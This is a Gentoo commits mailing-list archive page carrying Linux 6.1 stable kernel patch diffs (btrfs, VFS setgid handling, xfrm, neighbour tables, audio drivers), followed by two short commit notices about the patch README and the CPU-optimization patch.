+--- a/fs/btrfs/send.c
++++ b/fs/btrfs/send.c
+@@ -7839,10 +7839,10 @@ long btrfs_ioctl_send(struct inode *inode, struct btrfs_ioctl_send_args *arg)
+ 	/*
+ 	 * Check that we don't overflow at later allocations, we request
+ 	 * clone_sources_count + 1 items, and compare to unsigned long inside
+-	 * access_ok.
++	 * access_ok. Also set an upper limit for allocation size so this can't
++	 * easily exhaust memory. Max number of clone sources is about 200K.
+ 	 */
+-	if (arg->clone_sources_count >
+-	    ULONG_MAX / sizeof(struct clone_root) - 1) {
++	if (arg->clone_sources_count > SZ_8M / sizeof(struct clone_root)) {
+ 		ret = -EINVAL;
+ 		goto out;
+ 	}
+diff --git a/fs/fuse/file.c b/fs/fuse/file.c
+index 89f4741728ba3..c996c0ef8c632 100644
+--- a/fs/fuse/file.c
++++ b/fs/fuse/file.c
+@@ -1313,7 +1313,7 @@ static ssize_t fuse_cache_write_iter(struct kiocb *iocb, struct iov_iter *from)
+ 			return err;
+ 
+ 		if (fc->handle_killpriv_v2 &&
+-		    should_remove_suid(file_dentry(file))) {
++		    setattr_should_drop_suidgid(&init_user_ns, file_inode(file))) {
+ 			goto writethrough;
+ 		}
+ 
+diff --git a/fs/inode.c b/fs/inode.c
+index b608528efd3a4..8c4078889754f 100644
+--- a/fs/inode.c
++++ b/fs/inode.c
+@@ -1948,41 +1948,13 @@ skip_update:
+ }
+ EXPORT_SYMBOL(touch_atime);
+ 
+-/*
+- * The logic we want is
+- *
+- *	if suid or (sgid and xgrp)
+- *		remove privs
+- */
+-int should_remove_suid(struct dentry *dentry)
+-{
+-	umode_t mode = d_inode(dentry)->i_mode;
+-	int kill = 0;
+-
+-	/* suid always must be killed */
+-	if (unlikely(mode & S_ISUID))
+-		kill = ATTR_KILL_SUID;
+-
+-	/*
+-	 * sgid without any exec bits is just a mandatory locking mark; leave
+-	 * it alone.  If some exec bits are set, it's a real sgid; kill it.
+-	 */
+-	if (unlikely((mode & S_ISGID) && (mode & S_IXGRP)))
+-		kill |= ATTR_KILL_SGID;
+-
+-	if (unlikely(kill && !capable(CAP_FSETID) && S_ISREG(mode)))
+-		return kill;
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL(should_remove_suid);
+-
+ /*
+  * Return mask of changes for notify_change() that need to be done as a
+  * response to write or truncate. Return 0 if nothing has to be changed.
+  * Negative value on error (change should be denied).
+  */
+-int dentry_needs_remove_privs(struct dentry *dentry)
++int dentry_needs_remove_privs(struct user_namespace *mnt_userns,
++			      struct dentry *dentry)
+ {
+ 	struct inode *inode = d_inode(dentry);
+ 	int mask = 0;
+@@ -1991,7 +1963,7 @@ int dentry_needs_remove_privs(struct dentry *dentry)
+ 	if (IS_NOSEC(inode))
+ 		return 0;
+ 
+-	mask = should_remove_suid(dentry);
++	mask = setattr_should_drop_suidgid(mnt_userns, inode);
+ 	ret = security_inode_need_killpriv(dentry);
+ 	if (ret < 0)
+ 		return ret;
+@@ -2023,7 +1995,7 @@ static int __file_remove_privs(struct file *file, unsigned int flags)
+ 	if (IS_NOSEC(inode) || !S_ISREG(inode->i_mode))
+ 		return 0;
+ 
+-	kill = dentry_needs_remove_privs(dentry);
++	kill = dentry_needs_remove_privs(file_mnt_user_ns(file), dentry);
+ 	if (kill < 0)
+ 		return kill;
+ 
+@@ -2487,6 +2459,28 @@ struct timespec64 current_time(struct inode *inode)
+ }
+ EXPORT_SYMBOL(current_time);
+ 
++/**
++ * in_group_or_capable - check whether caller is CAP_FSETID privileged
++ * @mnt_userns: user namespace of the mount @inode was found from
++ * @inode:	inode to check
++ * @vfsgid:	the new/current vfsgid of @inode
++ *
++ * Check wether @vfsgid is in the caller's group list or if the caller is
++ * privileged with CAP_FSETID over @inode. This can be used to determine
++ * whether the setgid bit can be kept or must be dropped.
++ *
++ * Return: true if the caller is sufficiently privileged, false if not.
++ */
++bool in_group_or_capable(struct user_namespace *mnt_userns,
++			 const struct inode *inode, vfsgid_t vfsgid)
++{
++	if (vfsgid_in_group_p(vfsgid))
++		return true;
++	if (capable_wrt_inode_uidgid(mnt_userns, inode, CAP_FSETID))
++		return true;
++	return false;
++}
++
+ /**
+  * mode_strip_sgid - handle the sgid bit for non-directories
+  * @mnt_userns: User namespace of the mount the inode was created from
+@@ -2508,11 +2502,9 @@ umode_t mode_strip_sgid(struct user_namespace *mnt_userns,
+ 		return mode;
+ 	if (S_ISDIR(mode) || !dir || !(dir->i_mode & S_ISGID))
+ 		return mode;
+-	if (in_group_p(i_gid_into_mnt(mnt_userns, dir)))
+-		return mode;
+-	if (capable_wrt_inode_uidgid(mnt_userns, dir, CAP_FSETID))
++	if (in_group_or_capable(mnt_userns, dir,
++				i_gid_into_vfsgid(mnt_userns, dir)))
+ 		return mode;
+-
+ 	return mode & ~S_ISGID;
+ }
+ EXPORT_SYMBOL(mode_strip_sgid);
+diff --git a/fs/internal.h b/fs/internal.h
+index 6f0386b34faec..5545c26d86ae5 100644
+--- a/fs/internal.h
++++ b/fs/internal.h
+@@ -150,7 +150,9 @@ extern int vfs_open(const struct path *, struct file *);
+  * inode.c
+  */
+ extern long prune_icache_sb(struct super_block *sb, struct shrink_control *sc);
+-extern int dentry_needs_remove_privs(struct dentry *dentry);
++int dentry_needs_remove_privs(struct user_namespace *, struct dentry *dentry);
++bool in_group_or_capable(struct user_namespace *mnt_userns,
++			 const struct inode *inode, vfsgid_t vfsgid);
+ 
+ /*
+  * fs-writeback.c
+@@ -234,3 +236,9 @@ int do_setxattr(struct user_namespace *mnt_userns, struct dentry *dentry,
+ 		struct xattr_ctx *ctx);
+ 
+ ssize_t __kernel_write_iter(struct file *file, struct iov_iter *from, loff_t *pos);
++
++/*
++ * fs/attr.c
++ */
++int setattr_should_drop_sgid(struct user_namespace *mnt_userns,
++			     const struct inode *inode);
+diff --git a/fs/ocfs2/file.c b/fs/ocfs2/file.c
+index 9c67edd215d5a..4d78e09795179 100644
+--- a/fs/ocfs2/file.c
++++ b/fs/ocfs2/file.c
+@@ -1991,7 +1991,7 @@ static int __ocfs2_change_file_space(struct file *file, struct inode *inode,
+ 		}
+ 	}
+ 
+-	if (file && should_remove_suid(file->f_path.dentry)) {
++	if (file && setattr_should_drop_suidgid(&init_user_ns, file_inode(file))) {
+ 		ret = __ocfs2_write_remove_suid(inode, di_bh);
+ 		if (ret) {
+ 			mlog_errno(ret);
+@@ -2279,7 +2279,7 @@ static int ocfs2_prepare_inode_for_write(struct file *file,
+ 		 * inode. There's also the dinode i_size state which
+ 		 * can be lost via setattr during extending writes (we
+ 		 * set inode->i_size at the end of a write. */
+-		if (should_remove_suid(dentry)) {
++		if (setattr_should_drop_suidgid(&init_user_ns, inode)) {
+ 			if (meta_level == 0) {
+ 				ocfs2_inode_unlock_for_extent_tree(inode,
+ 								   &di_bh,
+diff --git a/fs/open.c b/fs/open.c
+index a81319b6177f6..9d0197db15e7b 100644
+--- a/fs/open.c
++++ b/fs/open.c
+@@ -54,7 +54,7 @@ int do_truncate(struct user_namespace *mnt_userns, struct dentry *dentry,
+ 	}
+ 
+ 	/* Remove suid, sgid, and file capabilities on truncate too */
+-	ret = dentry_needs_remove_privs(dentry);
++	ret = dentry_needs_remove_privs(mnt_userns, dentry);
+ 	if (ret < 0)
+ 		return ret;
+ 	if (ret)
+@@ -723,10 +723,10 @@ retry_deleg:
+ 		return -EINVAL;
+ 	if ((group != (gid_t)-1) && !setattr_vfsgid(&newattrs, gid))
+ 		return -EINVAL;
+-	if (!S_ISDIR(inode->i_mode))
+-		newattrs.ia_valid |=
+-			ATTR_KILL_SUID | ATTR_KILL_SGID | ATTR_KILL_PRIV;
+ 	inode_lock(inode);
++	if (!S_ISDIR(inode->i_mode))
++		newattrs.ia_valid |= ATTR_KILL_SUID | ATTR_KILL_PRIV |
++				     setattr_should_drop_sgid(mnt_userns, inode);
+ 	/* Continue to send actual fs values, not the mount values. */
+ 	error = security_path_chown(
+ 		path,
+diff --git a/include/linux/fs.h b/include/linux/fs.h
+index 081d1f539628b..f14ecbeab2a9d 100644
+--- a/include/linux/fs.h
++++ b/include/linux/fs.h
+@@ -3118,7 +3118,7 @@ extern void __destroy_inode(struct inode *);
+ extern struct inode *new_inode_pseudo(struct super_block *sb);
+ extern struct inode *new_inode(struct super_block *sb);
+ extern void free_inode_nonrcu(struct inode *inode);
+-extern int should_remove_suid(struct dentry *);
++extern int setattr_should_drop_suidgid(struct user_namespace *, struct inode *);
+ extern int file_remove_privs(struct file *);
+ 
+ /*
+@@ -3549,7 +3549,7 @@ int __init list_bdev_fs_names(char *buf, size_t size);
+ 
+ static inline bool is_sxid(umode_t mode)
+ {
+-	return (mode & S_ISUID) || ((mode & S_ISGID) && (mode & S_IXGRP));
++	return mode & (S_ISUID | S_ISGID);
+ }
+ 
+ static inline int check_sticky(struct user_namespace *mnt_userns,
+diff --git a/kernel/power/process.c b/kernel/power/process.c
+index ddd9988327fe2..beeab7f9fac86 100644
+--- a/kernel/power/process.c
++++ b/kernel/power/process.c
+@@ -27,6 +27,8 @@ unsigned int __read_mostly freeze_timeout_msecs = 20 * MSEC_PER_SEC;
+ 
+ static int try_to_freeze_tasks(bool user_only)
+ {
++	const char *what = user_only ? "user space processes" :
++					"remaining freezable tasks";
+ 	struct task_struct *g, *p;
+ 	unsigned long end_time;
+ 	unsigned int todo;
+@@ -36,6 +38,8 @@ static int try_to_freeze_tasks(bool user_only)
+ 	bool wakeup = false;
+ 	int sleep_usecs = USEC_PER_MSEC;
+ 
++	pr_info("Freezing %s\n", what);
++
+ 	start = ktime_get_boottime();
+ 
+ 	end_time = jiffies + msecs_to_jiffies(freeze_timeout_msecs);
+@@ -82,7 +86,6 @@ static int try_to_freeze_tasks(bool user_only)
+ 	elapsed_msecs = ktime_to_ms(elapsed);
+ 
+ 	if (todo) {
+-		pr_cont("\n");
+ 		pr_err("Freezing of tasks %s after %d.%03d seconds "
+ 		       "(%d tasks refusing to freeze, wq_busy=%d):\n",
+ 		       wakeup ? "aborted" : "failed",
+@@ -101,8 +104,8 @@ static int try_to_freeze_tasks(bool user_only)
+ 			read_unlock(&tasklist_lock);
+ 		}
+ 	} else {
+-		pr_cont("(elapsed %d.%03d seconds) ", elapsed_msecs / 1000,
+-			elapsed_msecs % 1000);
++		pr_info("Freezing %s completed (elapsed %d.%03d seconds)\n",
++			what, elapsed_msecs / 1000, elapsed_msecs % 1000);
+ 	}
+ 
+ 	return todo ? -EBUSY : 0;
+@@ -130,14 +133,11 @@ int freeze_processes(void)
+ 		static_branch_inc(&freezer_active);
+ 
+ 	pm_wakeup_clear(0);
+-	pr_info("Freezing user space processes ... ");
+ 	pm_freezing = true;
+ 	error = try_to_freeze_tasks(true);
+-	if (!error) {
++	if (!error)
+ 		__usermodehelper_set_disable_depth(UMH_DISABLED);
+-		pr_cont("done.");
+-	}
+-	pr_cont("\n");
++
+ 	BUG_ON(in_atomic());
+ 
+ 	/*
+@@ -166,14 +166,9 @@ int freeze_kernel_threads(void)
+ {
+ 	int error;
+ 
+-	pr_info("Freezing remaining freezable tasks ... ");
+-
+ 	pm_nosig_freezing = true;
+ 	error = try_to_freeze_tasks(false);
+-	if (!error)
+-		pr_cont("done.");
+ 
+-	pr_cont("\n");
+ 	BUG_ON(in_atomic());
+ 
+ 	if (error)
+diff --git a/net/caif/caif_socket.c b/net/caif/caif_socket.c
+index 748be72532485..78c9729a6057d 100644
+--- a/net/caif/caif_socket.c
++++ b/net/caif/caif_socket.c
+@@ -1015,6 +1015,7 @@ static void caif_sock_destructor(struct sock *sk)
+ 		return;
+ 	}
+ 	sk_stream_kill_queues(&cf_sk->sk);
++	WARN_ON_ONCE(sk->sk_forward_alloc);
+ 	caif_free_client(&cf_sk->layer);
+ }
+ 
+diff --git a/net/core/filter.c b/net/core/filter.c
+index 0c2666e041d3c..b79a070fa8246 100644
+--- a/net/core/filter.c
++++ b/net/core/filter.c
+@@ -5807,7 +5807,7 @@ static int bpf_ipv4_fib_lookup(struct net *net, struct bpf_fib_lookup *params,
+ 		neigh = __ipv6_neigh_lookup_noref_stub(dev, dst);
+ 	}
+ 
+-	if (!neigh)
++	if (!neigh || !(neigh->nud_state & NUD_VALID))
+ 		return BPF_FIB_LKUP_RET_NO_NEIGH;
+ 
+ 	return bpf_fib_set_fwd_params(params, neigh, dev, mtu);
+@@ -5922,7 +5922,7 @@ static int bpf_ipv6_fib_lookup(struct net *net, struct bpf_fib_lookup *params,
+ 	 * not needed here.
+ 	 */
+ 	neigh = __ipv6_neigh_lookup_noref_stub(dev, dst);
+-	if (!neigh)
++	if (!neigh || !(neigh->nud_state & NUD_VALID))
+ 		return BPF_FIB_LKUP_RET_NO_NEIGH;
+ 
+ 	return bpf_fib_set_fwd_params(params, neigh, dev, mtu);
+diff --git a/net/core/neighbour.c b/net/core/neighbour.c
+index 952a54763358e..bf081f62ae58b 100644
+--- a/net/core/neighbour.c
++++ b/net/core/neighbour.c
+@@ -269,7 +269,7 @@ static int neigh_forced_gc(struct neigh_table *tbl)
+ 			    (n->nud_state == NUD_NOARP) ||
+ 			    (tbl->is_multicast &&
+ 			     tbl->is_multicast(n->primary_key)) ||
+-			    time_after(tref, n->updated))
++			    !time_in_range(n->updated, tref, jiffies))
+ 				remove = true;
+ 			write_unlock(&n->lock);
+ 
+@@ -289,7 +289,17 @@ static int neigh_forced_gc(struct neigh_table *tbl)
+ 
+ static void neigh_add_timer(struct neighbour *n, unsigned long when)
+ {
++	/* Use safe distance from the jiffies - LONG_MAX point while timer
++	 * is running in DELAY/PROBE state but still show to user space
++	 * large times in the past.
++	 */
++	unsigned long mint = jiffies - (LONG_MAX - 86400 * HZ);
++
+ 	neigh_hold(n);
++	if (!time_in_range(n->confirmed, mint, jiffies))
++		n->confirmed = mint;
++	if (time_before(n->used, n->confirmed))
++		n->used = n->confirmed;
+ 	if (unlikely(mod_timer(&n->timer, when))) {
+ 		printk("NEIGH: BUG, double timer add, state is %x\n",
+ 		       n->nud_state);
+@@ -1001,12 +1011,14 @@ static void neigh_periodic_work(struct work_struct *work)
+ 				goto next_elt;
+ 			}
+ 
+-			if (time_before(n->used, n->confirmed))
++			if (time_before(n->used, n->confirmed) &&
++			    time_is_before_eq_jiffies(n->confirmed))
+ 				n->used = n->confirmed;
+ 
+ 			if (refcount_read(&n->refcnt) == 1 &&
+ 			    (state == NUD_FAILED ||
+-			     time_after(jiffies, n->used + NEIGH_VAR(n->parms, GC_STALETIME)))) {
++			     !time_in_range_open(jiffies, n->used,
++						 n->used + NEIGH_VAR(n->parms, GC_STALETIME)))) {
+ 				*np = n->next;
+ 				neigh_mark_dead(n);
+ 				write_unlock(&n->lock);
+diff --git a/net/core/stream.c b/net/core/stream.c
+index 516895f482356..cbb268c15251c 100644
+--- a/net/core/stream.c
++++ b/net/core/stream.c
+@@ -209,7 +209,6 @@ void sk_stream_kill_queues(struct sock *sk)
+ 	sk_mem_reclaim_final(sk);
+ 
+ 	WARN_ON_ONCE(sk->sk_wmem_queued);
+-	WARN_ON_ONCE(sk->sk_forward_alloc);
+ 
+ 	/* It is _impossible_ for the backlog to contain anything
+ 	 * when we get here.  All user references to this socket
+diff --git a/net/xfrm/xfrm_interface.c b/net/xfrm/xfrm_interface.c
+index 5a67b120c4dbd..94a3609548b11 100644
+--- a/net/xfrm/xfrm_interface.c
++++ b/net/xfrm/xfrm_interface.c
+@@ -310,6 +310,52 @@ static void xfrmi_scrub_packet(struct sk_buff *skb, bool xnet)
+ 	skb->mark = 0;
+ }
+ 
++static int xfrmi_input(struct sk_buff *skb, int nexthdr, __be32 spi,
++		       int encap_type, unsigned short family)
++{
++	struct sec_path *sp;
++
++	sp = skb_sec_path(skb);
++	if (sp && (sp->len || sp->olen) &&
++	    !xfrm_policy_check(NULL, XFRM_POLICY_IN, skb, family))
++		goto discard;
++
++	XFRM_SPI_SKB_CB(skb)->family = family;
++	if (family == AF_INET) {
++		XFRM_SPI_SKB_CB(skb)->daddroff = offsetof(struct iphdr, daddr);
++		XFRM_TUNNEL_SKB_CB(skb)->tunnel.ip4 = NULL;
++	} else {
++		XFRM_SPI_SKB_CB(skb)->daddroff = offsetof(struct ipv6hdr, daddr);
++		XFRM_TUNNEL_SKB_CB(skb)->tunnel.ip6 = NULL;
++	}
++
++	return xfrm_input(skb, nexthdr, spi, encap_type);
++discard:
++	kfree_skb(skb);
++	return 0;
++}
++
++static int xfrmi4_rcv(struct sk_buff *skb)
++{
++	return xfrmi_input(skb, ip_hdr(skb)->protocol, 0, 0, AF_INET);
++}
++
++static int xfrmi6_rcv(struct sk_buff *skb)
++{
++	return xfrmi_input(skb, skb_network_header(skb)[IP6CB(skb)->nhoff],
++			   0, 0, AF_INET6);
++}
++
++static int xfrmi4_input(struct sk_buff *skb, int nexthdr, __be32 spi, int encap_type)
++{
++	return xfrmi_input(skb, nexthdr, spi, encap_type, AF_INET);
++}
++
++static int xfrmi6_input(struct sk_buff *skb, int nexthdr, __be32 spi, int encap_type)
++{
++	return xfrmi_input(skb, nexthdr, spi, encap_type, AF_INET6);
++}
++
+ static int xfrmi_rcv_cb(struct sk_buff *skb, int err)
+ {
+ 	const struct xfrm_mode *inner_mode;
+@@ -937,8 +983,8 @@ static struct pernet_operations xfrmi_net_ops = {
+ };
+ 
+ static struct xfrm6_protocol xfrmi_esp6_protocol __read_mostly = {
+-	.handler	=	xfrm6_rcv,
+-	.input_handler	=	xfrm_input,
++	.handler	=	xfrmi6_rcv,
++	.input_handler	=	xfrmi6_input,
+ 	.cb_handler	=	xfrmi_rcv_cb,
+ 	.err_handler	=	xfrmi6_err,
+ 	.priority	=	10,
+@@ -988,8 +1034,8 @@ static struct xfrm6_tunnel xfrmi_ip6ip_handler __read_mostly = {
+ #endif
+ 
+ static struct xfrm4_protocol xfrmi_esp4_protocol __read_mostly = {
+-	.handler	=	xfrm4_rcv,
+-	.input_handler	=	xfrm_input,
++	.handler	=	xfrmi4_rcv,
++	.input_handler	=	xfrmi4_input,
+ 	.cb_handler	=	xfrmi_rcv_cb,
+ 	.err_handler	=	xfrmi4_err,
+ 	.priority	=	10,
+diff --git a/net/xfrm/xfrm_policy.c b/net/xfrm/xfrm_policy.c
+index 52538d5360673..7f49dab3b6b59 100644
+--- a/net/xfrm/xfrm_policy.c
++++ b/net/xfrm/xfrm_policy.c
+@@ -3670,6 +3670,9 @@ int __xfrm_policy_check(struct sock *sk, int dir, struct sk_buff *skb,
+ 			goto reject;
+ 		}
+ 
++		if (if_id)
++			secpath_reset(skb);
++
+ 		xfrm_pols_put(pols, npols);
+ 		return 1;
+ 	}
+diff --git a/scripts/tags.sh b/scripts/tags.sh
+index e137cf15aae9d..0d045182c08c0 100755
+--- a/scripts/tags.sh
++++ b/scripts/tags.sh
+@@ -91,7 +91,7 @@ all_compiled_sources()
+ 	{
+ 		echo include/generated/autoconf.h
+ 		find $ignore -name "*.cmd" -exec \
+-			grep -Poh '(?(?=^source_.* \K).*|(?=^  \K\S).*(?= \\))' {} \+ |
++			sed -n -E 's/^source_.* (.*)/\1/p; s/^  (\S.*) \\/\1/p' {} \+ |
+ 		awk '!a[$0]++'
+ 	} | xargs realpath -esq $([ -z "$KBUILD_ABS_SRCTREE" ] && echo --relative-to=.) |
+ 	sort -u
+diff --git a/sound/soc/codecs/es8326.c b/sound/soc/codecs/es8326.c
+index 87c1cc16592bb..555125efd9ad3 100644
+--- a/sound/soc/codecs/es8326.c
++++ b/sound/soc/codecs/es8326.c
+@@ -729,14 +729,16 @@ static int es8326_probe(struct snd_soc_component *component)
+ 	}
+ 	dev_dbg(component->dev, "jack-pol %x", es8326->jack_pol);
+ 
+-	ret = device_property_read_u8(component->dev, "everest,interrupt-src", &es8326->jack_pol);
++	ret = device_property_read_u8(component->dev, "everest,interrupt-src",
++				      &es8326->interrupt_src);
+ 	if (ret != 0) {
+ 		dev_dbg(component->dev, "interrupt-src return %d", ret);
+ 		es8326->interrupt_src = ES8326_HP_DET_SRC_PIN9;
+ 	}
+ 	dev_dbg(component->dev, "interrupt-src %x", es8326->interrupt_src);
+ 
+-	ret = device_property_read_u8(component->dev, "everest,interrupt-clk", &es8326->jack_pol);
++	ret = device_property_read_u8(component->dev, "everest,interrupt-clk",
++				      &es8326->interrupt_clk);
+ 	if (ret != 0) {
+ 		dev_dbg(component->dev, "interrupt-clk return %d", ret);
+ 		es8326->interrupt_clk = 0x45;
+diff --git a/sound/soc/codecs/rt715-sdca-sdw.c b/sound/soc/codecs/rt715-sdca-sdw.c
+index 3f981a9e7fb67..c54ecf3e69879 100644
+--- a/sound/soc/codecs/rt715-sdca-sdw.c
++++ b/sound/soc/codecs/rt715-sdca-sdw.c
+@@ -167,7 +167,7 @@ static int rt715_sdca_read_prop(struct sdw_slave *slave)
+ 	}
+ 
+ 	/* set the timeout values */
+-	prop->clk_stop_timeout = 20;
++	prop->clk_stop_timeout = 200;
+ 
+ 	return 0;
+ }
+diff --git a/sound/soc/sof/amd/acp.c b/sound/soc/sof/amd/acp.c
+index 36966643e36ab..8afd67ba1e5a3 100644
+--- a/sound/soc/sof/amd/acp.c
++++ b/sound/soc/sof/amd/acp.c
+@@ -316,7 +316,6 @@ static irqreturn_t acp_irq_thread(int irq, void *context)
+ {
+ 	struct snd_sof_dev *sdev = context;
+ 	const struct sof_amd_acp_desc *desc = get_chip_info(sdev->pdata);
+-	unsigned int base = desc->dsp_intr_base;
+ 	unsigned int val, count = ACP_HW_SEM_RETRY_COUNT;
+ 
+ 	val = snd_sof_dsp_read(sdev, ACP_DSP_BAR, desc->ext_intr_stat);
+@@ -326,28 +325,20 @@ static irqreturn_t acp_irq_thread(int irq, void *context)
+ 		return IRQ_HANDLED;
+ 	}
+ 
+-	val = snd_sof_dsp_read(sdev, ACP_DSP_BAR, base + DSP_SW_INTR_STAT_OFFSET);
+-	if (val & ACP_DSP_TO_HOST_IRQ) {
+-		while (snd_sof_dsp_read(sdev, ACP_DSP_BAR, desc->hw_semaphore_offset)) {
+-			/* Wait until acquired HW Semaphore lock or timeout */
+-			count--;
+-			if (!count) {
+-				dev_err(sdev->dev, "%s: Failed to acquire HW lock\n", __func__);
+-				return IRQ_NONE;
+-			}
++	while (snd_sof_dsp_read(sdev, ACP_DSP_BAR, desc->hw_semaphore_offset)) {
++		/* Wait until acquired HW Semaphore lock or timeout */
++		count--;
++		if (!count) {
++			dev_err(sdev->dev, "%s: Failed to acquire HW lock\n", __func__);
++			return IRQ_NONE;
+ 		}
+-
+-		sof_ops(sdev)->irq_thread(irq, sdev);
+-		val |= ACP_DSP_TO_HOST_IRQ;
+-		snd_sof_dsp_write(sdev, ACP_DSP_BAR, base + DSP_SW_INTR_STAT_OFFSET, val);
+-
+-		/* Unlock or Release HW Semaphore */
+-		snd_sof_dsp_write(sdev, ACP_DSP_BAR, desc->hw_semaphore_offset, 0x0);
+-
+-		return IRQ_HANDLED;
+ 	}
+ 
+-	return IRQ_NONE;
++	sof_ops(sdev)->irq_thread(irq, sdev);
++	/* Unlock or Release HW Semaphore */
++	snd_sof_dsp_write(sdev, ACP_DSP_BAR, desc->hw_semaphore_offset, 0x0);
++
++	return IRQ_HANDLED;
+ };
+ 
+ static irqreturn_t acp_irq_handler(int irq, void *dev_id)
+@@ -358,8 +349,11 @@ static irqreturn_t acp_irq_handler(int irq, void *dev_id)
+ 	unsigned int val;
+ 
+ 	val = snd_sof_dsp_read(sdev, ACP_DSP_BAR, base + DSP_SW_INTR_STAT_OFFSET);
+-	if (val)
++	if (val) {
++		val |= ACP_DSP_TO_HOST_IRQ;
++		snd_sof_dsp_write(sdev, ACP_DSP_BAR, base + DSP_SW_INTR_STAT_OFFSET, val);
+ 		return IRQ_WAKE_THREAD;
++	}
+ 
+ 	return IRQ_NONE;
+ }
+diff --git a/tools/testing/selftests/drivers/net/ocelot/tc_flower_chains.sh b/tools/testing/selftests/drivers/net/ocelot/tc_flower_chains.sh
+index 9c79bbcce5a87..aff0a59f92d9a 100755
+--- a/tools/testing/selftests/drivers/net/ocelot/tc_flower_chains.sh
++++ b/tools/testing/selftests/drivers/net/ocelot/tc_flower_chains.sh
+@@ -246,7 +246,7 @@ test_vlan_ingress_modify()
+ 	bridge vlan add dev $swp2 vid 300
+ 
+ 	tc filter add dev $swp1 ingress chain $(IS1 2) pref 3 \
+-		protocol 802.1Q flower skip_sw vlan_id 200 \
++		protocol 802.1Q flower skip_sw vlan_id 200 src_mac $h1_mac \
+ 		action vlan modify id 300 \
+ 		action goto chain $(IS2 0 0)
+ 


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-02-27 16:59 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-02-27 16:59 UTC (permalink / raw
  To: gentoo-commits

commit:     1d867d0c7f9d9b4d9082b1bc7a326c5b7e136a0c
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Mon Feb 27 16:59:22 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Feb 27 16:59:22 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=1d867d0c

Fix typo in README

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/0000_README b/0000_README
index c6d94abc..aa47ca9b 100644
--- a/0000_README
+++ b/0000_README
@@ -152,7 +152,7 @@ From:   https://github.com/graysky2/kernel_compiler_patch
 Desc:   Kernel >= 5.15 patch enables gcc = v11.1+ optimizations for additional CPUs.
 
 Patch:  5020_BMQ-and-PDS-io-scheduler-v6.1-r4-linux-tkg.patch
-From:   https://github.com/Frogging-Family/linux-tkghttps://gitlab.com/alfredchen/projectc
+From:   https://github.com/Frogging-Family/linux-tkg https://gitlab.com/alfredchen/projectc
 Desc:   BMQ(BitMap Queue) Scheduler. A new CPU scheduler developed from PDS(incld). Inspired by the scheduler in zircon.
 
 Patch:  5021_BMQ-and-PDS-gentoo-defaults.patch


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-02-26 18:24 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-02-26 18:24 UTC (permalink / raw
  To: gentoo-commits

commit:     458c4e0f9c4e70e70c669eaf74f3bb990312db59
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Feb 26 18:23:44 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Feb 26 18:23:44 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=458c4e0f

Update CPU Opt patch, add Emerald Rapids and update Sapphire Rapids

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 5010_enable-cpu-optimizations-universal.patch | 125 ++++++++++++++------------
 1 file changed, 69 insertions(+), 56 deletions(-)

diff --git a/5010_enable-cpu-optimizations-universal.patch b/5010_enable-cpu-optimizations-universal.patch
index 0841340b..7a1b717a 100644
--- a/5010_enable-cpu-optimizations-universal.patch
+++ b/5010_enable-cpu-optimizations-universal.patch
@@ -1,7 +1,6 @@
-From a0825feea3f100656d58446885b5f190284fd219
+From 70d4906b87983ed2ed5da78930a701625d881dd0 Mon Sep 17 00:00:00 2001
 From: graysky <therealgraysky@proton.me>
-Date: Fri, 4 Nov 2022 15:34:36 -0400
-Subject: [PATCH] more uarches for kernel 5.17+
+Date: Thu, 5 Jan 2023 14:29:37 -0500
 
 FEATURES
 This patch adds additional CPU options to the Linux kernel accessible under:
@@ -50,11 +49,12 @@ CPU-specific microarchitectures include:
 • Intel Xeon (Cascade Lake)
 • Intel Xeon (Cooper Lake)*
 • Intel 3rd Gen 10nm++ i3/i5/i7/i9-family (Tiger Lake)*
-• Intel 3rd Gen 10nm++ Xeon (Sapphire Rapids)‡
+• Intel 4th Gen 10nm++ Xeon (Sapphire Rapids)‡
 • Intel 11th Gen i3/i5/i7/i9-family (Rocket Lake)‡
 • Intel 12th Gen i3/i5/i7/i9-family (Alder Lake)‡
 • Intel 13th Gen i3/i5/i7/i9-family (Raptor Lake)§
 • Intel 14th Gen i3/i5/i7/i9-family (Meteor Lake)§
+• Intel 5th Gen 10nm++ Xeon (Emerald Rapids)§
 
 Notes: If not otherwise noted, gcc >=9.1 is required for support.
        *Requires gcc >=10.1 or clang >=10.0
@@ -99,20 +99,19 @@ REFERENCES
 3.  https://bugzilla.kernel.org/show_bug.cgi?id=77461
 4.  https://github.com/graysky2/kernel_gcc_patch/issues/15
 5.  http://www.linuxforge.net/docs/linux/linux-gcc.php
-
 ---
- arch/x86/Kconfig.cpu            | 416 ++++++++++++++++++++++++++++++--
- arch/x86/Makefile               |  43 +++-
- arch/x86/include/asm/vermagic.h |  72 ++++++
- 3 files changed, 514 insertions(+), 17 deletions(-)
+ arch/x86/Kconfig.cpu            | 427 ++++++++++++++++++++++++++++++--
+ arch/x86/Makefile               |  44 +++-
+ arch/x86/include/asm/vermagic.h |  74 ++++++
+ 3 files changed, 528 insertions(+), 17 deletions(-)
 
 diff --git a/arch/x86/Kconfig.cpu b/arch/x86/Kconfig.cpu
-index 542377cd419d..08d887d1220d 100644
+index 542377cd419d..f589971df2d3 100644
 --- a/arch/x86/Kconfig.cpu
 +++ b/arch/x86/Kconfig.cpu
 @@ -157,7 +157,7 @@ config MPENTIUM4
-
-
+ 
+ 
  config MK6
 -	bool "K6/K6-II/K6-III"
 +	bool "AMD K6/K6-II/K6-III"
@@ -121,7 +120,7 @@ index 542377cd419d..08d887d1220d 100644
  	  Select this for an AMD K6-family processor.  Enables use of
